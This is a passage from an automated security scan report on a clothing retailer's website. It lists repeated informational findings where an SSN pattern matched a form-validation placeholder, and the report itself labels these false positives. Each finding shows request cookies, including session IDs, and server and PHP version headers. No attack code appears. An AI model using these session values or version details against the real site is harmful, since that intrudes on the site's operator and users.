Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/collaboration-raf-simons/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g14cq5j3s7a2anivdbk2jrc240; expires=Tue, 09-Nov-2010 17:05:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.36. http://www.fredperry.com/limited-edition/men/footwear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/footwear/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2slh2p7lutfgf5u2pidtfd50b7; expires=Tue, 09-Nov-2010 17:05:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.37. http://www.fredperry.com/limited-edition/men/jackets/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/jackets/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=nr39n1id0gvvh30m4q71gbdkf6; expires=Tue, 09-Nov-2010 17:04:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.38. http://www.fredperry.com/limited-edition/men/knitwear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/knitwear/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ubioldesmpmb8b7d0a5icgorm6; expires=Tue, 09-Nov-2010 17:04:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.39. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/liberty-blank-canvas/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/liberty-blank-canvas/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=62pm30jf4t8kht82r9ibnp6ls4; expires=Tue, 09-Nov-2010 17:06:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Liberty
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.40. http://www.fredperry.com/limited-edition/men/new-styles/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/new-styles/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=54u1qgfkf8qlolg527u9ai43a5; expires=Tue, 09-Nov-2010 17:07:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> New Sty
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.41. http://www.fredperry.com/limited-edition/men/shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shirts/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t0anp9j4ldm4v0954ma0lbmc85; expires=Tue, 09-Nov-2010 17:03:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.42. http://www.fredperry.com/limited-edition/men/shorts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/shorts/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/shorts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bn4h720b11dmhiglquk9bd3kr3; expires=Tue, 09-Nov-2010 17:09:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.43. http://www.fredperry.com/limited-edition/men/trousers/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/trousers/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i4na8def5unfa7j373r279jl47; expires=Tue, 09-Nov-2010 17:05:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.44. http://www.fredperry.com/limited-edition/men/woven-shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/woven-shirts/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/men/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:06:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7fcrhil4hsu1qmf71it9cvvk30; expires=Tue, 09-Nov-2010 17:06:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.45. http://www.fredperry.com/limited-edition/women/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=669gvefst4knokvfv0b7jrff56; expires=Tue, 09-Nov-2010 17:09:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.46. http://www.fredperry.com/limited-edition/women/accessories/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/women/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=21oohvlga4t0df2h7039a5rr11; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.47. http://www.fredperry.com/limited-edition/women/bags/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/women/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gjmo0olg8j8r5ghcuujs3cps30; expires=Tue, 09-Nov-2010 17:11:27 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.48. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kqdflb0gnoias37ltuh5ltdlg1; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Ann-Sof
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.49. http://www.fredperry.com/limited-edition/women/collaboration/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The following social security number pattern was matched in the response. The match is the placeholder 123-45-6789 in a client-side form-validation hint ("For example 123-45-6789", visible in the response excerpt below), not customer data, so this is a false positive of the private-data check.

Request

GET /limited-edition/women/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
